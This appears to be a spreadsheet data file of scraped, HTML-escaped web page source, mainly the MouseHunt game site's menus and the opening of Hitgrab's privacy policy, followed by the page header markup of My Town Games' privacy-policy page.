class="menuItem dropdown support last"&gt;Help&lt;div class="arrow"&gt;&lt;/div&gt;&lt;div class="dropdownContent"&gt;&lt;a href="https://www.mousehuntgame.com/preferences.php" class="preferences" onclick="hg.utils. PageUtil.setPage('Preferences'); return false;"&gt;&lt;b&gt;Settings&lt;/b&gt;&lt;span&gt;Set your MouseHunt preferences.&lt;/span&gt;&lt;/a&gt;&lt;a href="https://www.mousehuntgame.com/support.php?"</t>
  </si>
  <si>
    <t>class="tech"&gt;&lt;b&gt;FAQ&lt;/b&gt;&lt;span&gt;Frequently Asked Questions.&lt;/span&gt;&lt;/a&gt;&lt;a href="#" onclick="app.pages. SupportPage.showContactUs(); return false;" class="tech"&gt;&lt;b&gt;Contact Us&lt;/b&gt;&lt;span&gt;Have a problem? Come contact us.&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mousehuntHeaderView-newsTicker"&gt;&lt;div class="label"&gt;NEWS:&lt;/div&gt;&lt;div class="ticker"&gt;Need help?</t>
  </si>
  <si>
    <t>&lt;a href="/support.php" target="_blank"&gt;Check out the FAQ!&lt;/a&gt;&lt;/div&gt;&lt;div class="actions"&gt;&lt;a href="#" class="previous"&gt;&lt;span&gt;&lt;/span&gt;&lt;/a&gt;&lt;a href="#" class="next"&gt;&lt;span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="tickerMessageStorage"&gt;&lt;div class="ticker-message"&gt;Need help? &lt;a href="/support.php"</t>
  </si>
  <si>
    <t>target="_blank"&gt;Check out the FAQ!&lt;/a&gt;&lt;/div&gt;&lt;div class="ticker-message"&gt;Keep up to date with new releases, &lt;a href='/preferences.php'&gt;join the MouseHunt mailing list&lt;/a&gt;!&lt;/div&gt;&lt;div class="ticker-message"&gt;&lt;a href="https://www.facebook.com/MouseHunt-273678496019476/" target="_blank"&gt;Like us on Facebook&lt;/a&gt; to keep up to date on when events start and end.&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="envHeaderImg" class="mousehuntHud-top" style="background-image:url(https://www.mousehuntgame.com/images/environments/6ef3ffe2f90a79250807b46105e77b68.jpg?cv=2);"&gt;&lt;div class="mousehuntHud-gameInfo"&gt;&lt;span&gt;Hunters Online: 9,556&lt;/span&gt;&lt;a href="https://www.mousehuntgame.com/friends.php" onclick="hg.utils. PageUtil.setPage('Friends'); return false;"&gt;Friends Online: 0&lt;/a&gt;&lt;/div&gt;&lt;div class="huntersHornView " data-glint-image="https://www.mousehuntgame.com/images/ui/hunters_horn/horn_glint.gif" data-glint-tournament-image="https://www.mousehuntgame.com/images/ui/hunters_horn/tournament_glint.gif"&gt;&lt;div class="huntersHornView__backdrop "&gt;&lt;/div&gt;&lt;div class="huntersHornView__turnResult "&gt;&lt;/div&gt;&lt;div class="huntersHornView__onboardingBoundingBox"&gt;&lt;/div&gt;&lt;a class="huntersHornView__horn  " href="https://www.mousehuntgame.com/turn.php" draggable="false" title="Sound the Hunter's Horn!"&gt;&lt;div class="huntersHornView__hornImage"&gt;&lt;div class="huntersHornView__musicNoteContainer"&gt;&lt;div class="huntersHornView__musicNote"&gt;&lt;/div&gt;&lt;div class="huntersHornView__musicNote"&gt;&lt;/div&gt;&lt;div class="huntersHornView__musicNote"&gt;&lt;/div&gt;&lt;div class="huntersHornView__musicNote"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="huntersHornView__hornForeground"&gt;&lt;/div&gt;&lt;div class="huntersHornView__hornGlint"&gt;&lt;img class="huntersHornView__hornGlintImage" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="huntersHornView__hornBanner"&gt;&lt;div class="huntersHornView__hornBannerTranslate"&gt;&lt;div class="huntersHornView__hornBannerImage"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/a&gt;&lt;div class="huntersHornView__messageContainer"&gt;&lt;div class="huntersHornView__message"&gt;&lt;div class="huntersHornView__messageHeader"&gt;&lt;div class="huntersHornView__messageTitle"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div</t>
  </si>
  <si>
    <t>class="huntersHornView__messageBody"&gt;&lt;div class="huntersHornView__messageContent"&gt;&lt;div class="huntersHornView__messageText"&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="#" class="huntersHornView__messageAction"&gt;&lt;div class="huntersHornView__messageActionLabel"&gt;&lt;span class="huntersHornView__messageActionText"&gt;&lt;/span&gt;&lt;span class="huntersHornView__messageActionCountdown"&gt;&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="huntersHornView__messageFooter"&gt;&lt;div class="huntersHornView__messageFooterContent"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="huntersHornView__timer ready huntersHornView__timer--default"&gt;&lt;div class="huntersHornView__timerState huntersHornView__timerState--type-countdown huntersHornView__countdown"&gt;0:00&lt;/div&gt;&lt;div class="huntersHornView__timerState huntersHornView__timerState--type-ready"&gt;Ready&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;a class="mousehuntHud-shield " href="https://www.mousehuntgame.com/profile.php?snuid=" target="_top" title="" onclick="hg.utils. PageUtil.showHunterProfile(); return false;"&gt;&lt;/a&gt;&lt;div class="mousehuntHud-environment"&gt;&lt;div class="mousehuntHud-environmentIconWrapper"&gt;&lt;div class="mousehuntHud-environmentIcon" style="background-image:url(https://www.mousehuntgame.com/images/environments/b1a5b70c94dc8f19f0e52468a16289b7.jpg?cv=2);"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mousehuntHud-environmentName"&gt;Meadow&lt;/div&gt;&lt;/div&gt;&lt;a href="#" onclick="hg.views.</t>
  </si>
  <si>
    <t>MarketplaceView.show(); return false;" class="mousehuntHud-marketPlace "&gt;&lt;/a&gt;&lt;a href="#" onclick="MHCheckout.show('Page', 'checkout_button'); return false;" class="mousehuntHud-premiumShop hasNewLimitedItems"&gt;&lt;div class="mousehuntHud-premiumShop-newItemsBanner"&gt;&lt;/div&gt;&lt;/a&gt;&lt;div class="mousehuntHud-menu default"&gt;&lt;ul&gt;&lt;li class="camp"&gt;&lt;a href="https://www.mousehuntgame.com/camp.php" target="_self" class="mousehuntHud-menu-item root" data-page="Camp" data-tab=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;&lt;div class="name"&gt;Camp&lt;/div&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="travel"&gt;&lt;a href="https://www.mousehuntgame.com/travel.php" target="_self" class="mousehuntHud-menu-item root" data-page="Travel" data-tab=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;&lt;div class="name"&gt;Travel&lt;/div&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="inventory hasChildren"&gt;&lt;a href="https://www.mousehuntgame.com/inventory.php?tab=cheese&amp;amp;sub_tab=all" target="_self" class="mousehuntHud-menu-item root" data-page="Inventory" data-tab=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;&lt;div class="name"&gt;Inventory&lt;/div&gt;&lt;/a&gt;&lt;ul&gt;&lt;li class="cheese "&gt;&lt;a href="https://www.mousehuntgame.com/inventory.php?tab=cheese" onclick="" target="_self" data-page="Inventory" data-tab="cheese" data-sub-tab="all" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Cheese&lt;/a&gt;&lt;/li&gt;&lt;li class="traps "&gt;&lt;a href="https://www.mousehuntgame.com/inventory.php?tab=traps" onclick="" target="_self" data-page="Inventory" data-tab="traps" data-sub-tab="base" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Traps&lt;/a&gt;&lt;/li&gt;&lt;li class="crafting "&gt;&lt;a href="https://www.mousehuntgame.com/inventory.php?tab=crafting" onclick="" target="_self" data-page="Inventory" data-tab="crafting" data-sub-tab="recipe" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Crafting&lt;/a&gt;&lt;/li&gt;&lt;li class="potions "&gt;&lt;a href="https://www.mousehuntgame.com/inventory.php?tab=potions" onclick="" target="_self" data-page="Inventory" data-tab="potions" data-sub-tab="all" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Potions&lt;/a&gt;&lt;/li&gt;&lt;li class="special "&gt;&lt;a href="https://www.mousehuntgame.com/inventory.php?tab=special&amp;amp;sub_tab=all" onclick="" target="_self" data-page="Inventory" data-tab="special" data-sub-tab="all" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Special&lt;/a&gt;&lt;/li&gt;&lt;li class="baskets "&gt;&lt;a href="https://www.mousehuntgame.com/inventory.php?tab=special&amp;amp;tag=convertibles" onclick="" target="_self" data-page="Inventory" data-tab="special" data-sub-tab="all" data-tag="convertibles"&gt;&lt;div class="icon"&gt;&lt;/div&gt;Baskets &amp;amp; Kits&lt;/a&gt;&lt;/li&gt;&lt;li class="treasure_chests "&gt;&lt;a href="https://www.mousehuntgame.com/inventory.php?tab=special&amp;amp;tag=treasure_chests" onclick="" target="_self" data-page="Inventory" data-tab="special" data-sub-tab="all" data-tag="treasure_chests"&gt;&lt;div class="icon"&gt;&lt;/div&gt;Treasure Chests&lt;/a&gt;&lt;/li&gt;&lt;li class="collectibles "&gt;&lt;a href="https://www.mousehuntgame.com/inventory.php?tab=collectibles" onclick="" target="_self" data-page="Inventory" data-tab="collectibles" data-sub-tab="all" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Collectibles&lt;/a&gt;&lt;/li&gt;&lt;li class="torn_pages "&gt;&lt;a href="https://www.mousehuntgame.com/inventory.php?tab=plankrun" onclick="" target="_self" data-page="Inventory" data-tab="plankrun" data-sub-tab="all" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Torn Pages&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li class="shops hasChildren"&gt;&lt;a href="https://www.mousehuntgame.com/shops.php?tab=cheese_shoppe" target="_self" class="mousehuntHud-menu-item root" data-page="Shops" data-tab="cheese_shoppe"&gt;&lt;div class="icon"&gt;&lt;/div&gt;&lt;div class="name"&gt;Shops&lt;/div&gt;&lt;/a&gt;&lt;ul&gt;&lt;li class="cheese_shoppe "&gt;&lt;a href="https://www.mousehuntgame.com/shops.php?tab=cheese_shoppe" onclick="" target="_self" data-page="Shops" data-tab="cheese_shoppe" data-sub-tab="all" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Cheese Shoppe&lt;/a&gt;&lt;/li&gt;&lt;li class="trapsmith "&gt;&lt;a href="https://www.mousehuntgame.com/shops.php?tab=trapsmith" onclick="" target="_self" data-page="Shops" data-tab="trapsmith" data-sub-tab="all" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Trapsmith&lt;/a&gt;&lt;/li&gt;&lt;li class="charm_shoppe "&gt;&lt;a href="https://www.mousehuntgame.com/shops.php?tab=charm_shoppe" onclick="" target="_self" data-page="Shops" data-tab="charm_shoppe" data-sub-tab="all" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Charm Shoppe&lt;/a&gt;&lt;/li&gt;&lt;li class="general_store "&gt;&lt;a href="https://www.mousehuntgame.com/shops.php?tab=general_store" onclick="" target="_self" data-page="Shops" data-tab="general_store" data-sub-tab="all" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;General Store&lt;/a&gt;&lt;/li&gt;&lt;li class="cartographer "&gt;&lt;a href="https://www.mousehuntgame.com/shops.php?tab=cartographer" onclick="" target="_self" data-page="Shops" data-tab="cartographer" data-sub-tab="all" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Cartographer&lt;/a&gt;&lt;/li&gt;&lt;li class="prize_shoppe "&gt;&lt;a href="https://www.mousehuntgame.com/shops.php?tab=kings_cart" onclick="" target="_self" data-page="Shops" data-tab="kings_cart" data-sub-tab="all" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;King's Cart&lt;/a&gt;&lt;/li&gt;&lt;li class="marketplace "&gt;&lt;a href="https://www.mousehuntgame.com/marketplace.php" onclick="hg.views. MarketplaceView.show(); return false" target="_self" data-page="" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Marketplace&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li class="mice"&gt;&lt;a href="https://www.mousehuntgame.com/adversaries.php" target="_self" class="mousehuntHud-menu-item root" data-page="Adversaries" data-tab=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;&lt;div class="name"&gt;Mice&lt;/div&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="friends hasChildren"&gt;&lt;a href="https://www.mousehuntgame.com/friends.php?tab=friends" target="_self" class="mousehuntHud-menu-item root" data-page="Friends" data-tab=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;&lt;div class="name"&gt;Friends&lt;/div&gt;&lt;/a&gt;&lt;ul&gt;&lt;li class="friend_list "&gt;&lt;a href="https://www.mousehuntgame.com/friends.php?tab=friends" onclick="" target="_self" data-page="Friends" data-tab="friends" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Friend List&lt;/a&gt;&lt;/li&gt;&lt;li class="hunter_community "&gt;&lt;a href="https://www.mousehuntgame.com/friends.php?tab=requests&amp;amp;sub_tab=community" onclick="" target="_self" data-page="Friends" data-tab="requests" data-sub-tab="community" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Find Friends&lt;/a&gt;&lt;/li&gt;&lt;li class="community_maps "&gt;&lt;a href="https://www.mousehuntgame.com/camp.php?community_maps=public" onclick="hg.controllers. TreasureMapController.showCommunityPublicListings(); return false;" target="_self" data-page="" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Community Maps&lt;/a&gt;&lt;/li&gt;&lt;li class="free_gifts "&gt;&lt;a href="https://www.mousehuntgame.com/gift.php" onclick="hg.views.</t>
  </si>
  <si>
    <t>GiftSelectorView.show(); return false;" target="_self" data-page="" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Send Gifts&lt;/a&gt;&lt;/li&gt;&lt;li class="send_supplies "&gt;&lt;a href="https://www.mousehuntgame.com/supplytransfer.php" onclick="" target="_self" data-page="" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Send Supplies&lt;/a&gt;&lt;/li&gt;&lt;li class="team "&gt;&lt;a href="https://www.mousehuntgame.com/team.php" onclick="" target="_self" data-page="Team" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;My Team&lt;/a&gt;&lt;/li&gt;&lt;li class="tournaments "&gt;&lt;a href="https://www.mousehuntgame.com/tournament.php" onclick="" target="_self" data-page="Tournament" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Tournaments&lt;/a&gt;&lt;/li&gt;&lt;li class="tournament_scoreboards "&gt;&lt;a href="https://www.mousehuntgame.com/scoreboards.php?tab=tournament" onclick="" target="_self" data-page="Scoreboards" data-tab="tournament" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Tournament Scoreboards&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li class="kingdom hasChildren"&gt;&lt;a href="https://www.mousehuntgame.com/forum.php" target="_self" class="mousehuntHud-menu-item root" data-page="Forum" data-tab=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;&lt;div class="name"&gt;Kingdom&lt;/div&gt;&lt;/a&gt;&lt;ul&gt;&lt;li class="forum "&gt;&lt;a href="https://www.mousehuntgame.com/forum.php" onclick="" target="_self" data-page="Forum" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Forum&lt;/a&gt;&lt;/li&gt;&lt;li class="news "&gt;&lt;a href="https://www.mousehuntgame.com/news.php" onclick="" target="_self" data-page="News" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;News&lt;/a&gt;&lt;/li&gt;&lt;li class="scoreboards "&gt;&lt;a href="https://www.mousehuntgame.com/scoreboards.php?tab=main" onclick="" target="_self" data-page="Scoreboards" data-tab="main" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Scoreboards&lt;/a&gt;&lt;/li&gt;&lt;li class="discord_server "&gt;&lt;a href="https://www.mousehuntgame.com/discord.php" onclick="" target="_self" data-page="JoinDiscord" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Discord Server&lt;/a&gt;&lt;/li&gt;&lt;li class="wiki "&gt;&lt;a href="https://mhwiki.hitgrab.com/wiki/" onclick="" target="_blank" data-page="" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;MouseHunt Wiki&lt;div class="external_icon"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="guide "&gt;&lt;a href="https://adefinitivemhguide.wordpress.com/" onclick="" target="_blank" data-page="" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;MozKa's MH Guide&lt;div class="external_icon"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="feedback_friday "&gt;&lt;a href="https://gaming.youtube.com/c/MouseHuntTheGame/live" onclick="" target="_blank" data-page="" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;Feedback Friday&lt;div class="external_icon"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="merch_store "&gt;&lt;a href="https://society6.com/hitgrab/all" onclick="" target="_blank" data-page="" data-tab="" data-sub-tab="" data-tag=""&gt;&lt;div class="icon"&gt;&lt;/div&gt;HitGrab Merch Store&lt;div</t>
  </si>
  <si>
    <t>class="external_icon"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mousehuntHud-marbleDrawer clear-block"&gt;&lt;div class="headsUpDisplayView"&gt;&lt;div class="headsUpDisplayView-stats"&gt;&lt;div class="mousehuntHud-userStatBar"&gt;&lt;a href="https://www.mousehuntgame.com/p.php?id=" class="mousehuntHud-profilePic " onclick="hg.utils. PageUtil.showHunterProfile(); return false;"&gt;&lt;div class="profileImage " style="background-image: url(https://www.mousehuntgame.com/images/mice/square/e1bf22ff293087a44f1d6845654151bb.jpg);"&gt;&lt;/div&gt;&lt;/a&gt;&lt;a class="mousehuntHud-userStat title pageUtil-link  " href="https://www.mousehuntgame.com/title.php" data-page="Title" title="0% Novice"&gt;&lt;div class="title-container"&gt;&lt;div class="shield" style="background-image: url(https://www.mousehuntgame.com/images/titles/f6bd9e523ad0e1af06323d1122744956.gif?cv=2);"&gt;&lt;/div&gt;&lt;span class="label hud_title"&gt;Novice&lt;/span&gt;&lt;/div&gt;&lt;div class="mousehuntHud-titleProgressBar"&gt;&lt;span class="dot"&gt;&lt;/span&gt;&lt;div class="wrapper"&gt;&lt;span class="bar" style="width: 0%;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;span class="value"&gt;&lt;span class="hud_titlePercentage"&gt;0&lt;/span&gt;%&lt;/span&gt;&lt;span class="mousehuntHud-userStat-maxTitle"&gt;max title&lt;/span&gt;&lt;/a&gt;&lt;div class="mousehuntHud-userStat goldPoints "&gt;&lt;div class="mousehuntHud-userStat-table"&gt;&lt;div class="mousehuntHud-userStat-row gold"&gt;&lt;span class="label"&gt;Gold&lt;/span&gt;&lt;span class="value hud_gold"&gt;1,000&lt;/span&gt;&lt;/div&gt;&lt;div class="mousehuntHud-userStat-row points"&gt;&lt;span class="label"&gt;Points&lt;/span&gt;&lt;span class="value hud_points"&gt;0&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;a class="mousehuntHud-userStat trap base " href="#" onclick="app.views.HeadsUpDisplayView.hud.trapComponentOnClick('base'); return false;" data-item-id="" title=""&gt;&lt;div class="icon" style=""&gt;&lt;/div&gt;&lt;/a&gt;&lt;a class="mousehuntHud-userStat trap weapon " href="#" onclick="app.views.HeadsUpDisplayView.hud.trapComponentOnClick('weapon'); return false;" data-item-id="" title=""&gt;&lt;div class="icon" style=""&gt;&lt;/div&gt;&lt;/a&gt;&lt;a class="mousehuntHud-userStat bait empty " href="#" onclick="app.views.HeadsUpDisplayView.hud.trapComponentOnClick('bait'); return false;" data-item-id="0" title=""&gt;&lt;div class="icon" style=""&gt;&lt;/div&gt;&lt;span class="label"&gt;No bait armed.&lt;/span&gt;&lt;span class="value"&gt;0&lt;/span&gt;&lt;/a&gt;&lt;a class="mousehuntHud-userStat trinket empty hidden " href="#" onclick="app.views.HeadsUpDisplayView.hud.trapComponentOnClick('trinket'); return false;" data-item-id="" title=""&gt;&lt;div class="icon" style=""&gt;&lt;/div&gt;&lt;span class="label"&gt;No charm.&lt;/span&gt;&lt;span class="value"&gt;0&lt;/span&gt;&lt;/a&gt;&lt;a class="mousehuntHud-userStat treasureMap empty " onclick="hg.controllers. TreasureMapController.show(); return false;" href="#"&gt;&lt;div class="icon" style=""&gt;&lt;div class="notification "&gt;&lt;/div&gt;&lt;div class="corkboardUpdate "&gt;&lt;/div&gt;&lt;div class="miceWarning "&gt;&lt;/div&gt;&lt;/div&gt;&lt;span class="label"&gt;Treasure Maps&lt;/span&gt;&lt;span class="value"&gt;Start New&lt;/span&gt;&lt;/a&gt;&lt;a class="mousehuntHud-userStat team empty " href="https://www.mousehuntgame.com/team.php" title="Create a team!"</t>
  </si>
  <si>
    <t xml:space="preserve">onclick="app.pages.TeamPage.showUserTeamPage(); return false;"&gt;&lt;div class="icon"&gt;&lt;/div&gt;&lt;div class="corkboardUpdate "&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="hudLocationContent" class="hudLocationContent  empty"&gt;&lt;/div&gt;&lt;div id="hudGlobalContent" class="hudGlobalContent empty"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mousehuntHud-tabs empty"&gt;&lt;div class="mousehuntHud-page-tabHeader-container"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mousehuntPage-loading"&gt;&lt;/div&gt;&lt;div class="mousehuntPage-puzzle "&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mousehuntPage-content " data-page="PagePrivacyPolicy"&gt;&lt;div class="mousehuntPage-messages"&gt;&lt;div id="pagemessage"&gt;&lt;/div&gt;&lt;div class="journalContainer journal jsingle theme_classic" data-limit="3" data-owner="0"&gt;&lt;div class="close"&gt;&lt;a href="#" onclick="hg.views.JournalView.hideJournal(); return false;"&gt;close&lt;/a&gt;&lt;/div&gt;&lt;div class="top"&gt;&lt;/div&gt;&lt;div class="content"&gt;&lt;div class="journalEntries journalEntries 0"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="bottom"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mousehuntHud-page-tabContentContainer clear-block"&gt;&lt;style type="text/css"&gt;
	.tos {
		font-family: arial, helvetica, sans-serif;
		font-size: 12px;
	}
	.tos h1 {
		margin-bottom: 15px;
	}
	.tos h2 {
		font-size: 14px;
		margin-bottom: 10px;
		margin-top: 10px;
	}
	.tos h3 {
		font-size: 12px;
		margin-bottom: 10px;
		margin-top: 10px;
	}
	.tos a {
		text-decoration: none;
	}
	.tos a:hover {
		text-decoration: underline;
	</t>
  </si>
  <si>
    <t>}
	.tos p {
		margin: 5px 10px 5px 10px;
	}
	.tos ul {
		list-style: square inside;
		padding-left: 10px;
	}
&lt;/style&gt;
&lt;div class='tos'&gt;
&lt;h2&gt;Privacy Policy&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">This privacy policy refers to any personal online service offered by Hitgrab, Inc. ('Hitgrab'), which may be a downloaded software, a software embedded on a web site ('Hitgrab Games') any applications created by Hitgrab and available through social networking sites, any software running on Hitgrab's servers, ('Hitgrab Software'), content, related documentation, information on the Hitgrab domain, and information made available by users to each other through the Hitgrab Software (collectively, the 'Service'). This policy is intended to let you know how we use your information, and how we protect that information from unauthorized disclosure to others.
 &lt;p&gt;By using the Service, you consent to the collection and use of the personal information outlined in this document.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt; What Information Do We Collect?&lt;/h2&gt;
&lt;p&gt;When you register for a Hitgrab Game or Service, we collect your:
&lt;ul&gt;
&lt;li&gt;Name&lt;/li&gt;
&lt;li&gt;Gender&lt;/li&gt;
&lt;li&gt;Birthdate&lt;/li&gt;
&lt;li&gt;Country&lt;/li&gt;
&lt;li&gt;Timezone&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt; We store this information for more than 24 hours, and use it in your Hitgrab profile.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We also collect your city, state and postal/zip code location, and store this information for 24 hours only. On occasion, we may allow you to voluntarily submit other information about yourself (such as gender, age, occupation, hobbies, interests, etc.), or we may collect that information from social networking systems on which you have used Hitgrab Games (in accordance with the terms of use of those systems). These activities are also covered by the rules outlined in this privacy policy.
</t>
  </si>
  <si>
    <t>&lt;p&gt;If you choose to share information about yourself in other content, such as in games, your actions will be considered public, and we accept no liability for information which you freely disclose to other users. Personal information that you disclose to other users may be collected and used by others, and you do so at their own risk. Terminating your account, which may be done at any time via Hitgrab customer support, will remove this information from public view.</t>
  </si>
  <si>
    <t>Hitgrab may, (but is not obligated to) keep collected information regarding your account after termination.
 &lt;p&gt;When you access the Service on your social network page or access the Service on someone else's page, we may record information regarding the use of that Service, and we may collect other information that is visible on your social network page in keeping with that page's terms of use. It is your responsibility to be aware of the terms of use associated with the social networking sites on which we operate.</t>
  </si>
  <si>
    <t>We may use information about you that we collect from other sources, such as newspapers, blogs, instant messaging services and other Hitgrab users to add to your profile.
 &lt;p&gt; We are not responsible for the privacy policies of any other website.</t>
  </si>
  <si>
    <t>These terms apply solely to Services provided by Hitgrab.
 &lt;p&gt;Hitgrab also collects aggregate information about use of the Service, in order to assess user activity. This information includes data on users accessing the Hitgrab site or playing Hitgrab games or using games on other sites, such as internet protocol addresses, browser type, browser language, referring / exit pages and URLs, other browser history, platform type, number of clicks, domain names, landing pages, pages viewed and the order of those page</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!doctype html&gt;
&lt;html lang="en" prefix="og: http://ogp.me/ns#"&gt;
  &lt;head&gt;
  &lt;meta charset="utf-8"&gt;
  &lt;meta http-equiv="x-ua-compatible" content="ie=edge"&gt;
  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
  &lt;title&gt;Privacy Policy | My Town Games&lt;/title&gt;
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;!-- This site is optimized with the Yoast SEO Premium plugin v7.8.1 - https://yoast.com/wordpress/plugins/seo/ --&gt;
&lt;meta name="description" content="My Town is an award winning games studio that creates digital open world dollhouse apps/games that promote creativity and open-ended play for childrens.</t>
  </si>
  <si>
    <t>"/&gt;
&lt;link rel="canonical" href="https://my-town.com/privacy-policy/" /&gt;
&lt;meta property="og:locale" content="en_US" /&gt;
&lt;meta property="og:type" content="article" /&gt;
&lt;meta property="og:title" content="Privacy Policy | My Town Games" /&gt;
&lt;meta property="og:description" content="My Town is an award winning games studio that creates digital open world dollhouse apps/games that promote creativity and open-ended play for childrens." /&gt;
&lt;meta property="og:url" content="https://my-town.com/privacy-policy/" /&gt;
&lt;meta property="og:site_name" content="My Town Games" /&gt;
&lt;meta property="article:publisher" content="https://www.facebook.com/mytowngames" /&gt;
&lt;meta name="twitter:card" content="summary_large_image" /&gt;
&lt;meta name="twitter:description" content="My Town is an award winning games studio that creates digital open world dollhouse apps/games that promote creativity and open-ended play for childrens." /&gt;
&lt;meta name="twitter:title" content="Privacy Policy | My Town Games" /&gt;
&lt;meta name="twitter:site" content="@MyTownGames" /&gt;
&lt;meta name="twitter:image" content="https://my-town.com/wp-content/uploads/2019/05/COPPA.png" /&gt;
&lt;meta name="twitter:creator" content="@MyTownGames" /&gt;
&lt;!-- / Yoast SEO Premium plugin. --&gt;
&lt;link rel='dns-prefetch' href='//www.google.com' /&gt;
&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/my-town.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};
/*!</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</si>
  <si>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id='wp-block-library-css' href='https://my-town.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://my-town.com/wp-includes/css/classic-themes.min.css?ver=1'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</si>
  <si>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rel='stylesheet' id='contact-form-7-css' href='https://my-town.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cf7cf-style-css' href='https://my-town.com/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.0.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='sage/css-css' href='https://my-town.com/wp-content/themes/mytown/dist/styles/main.css' type='text/css' media='all' /&gt;
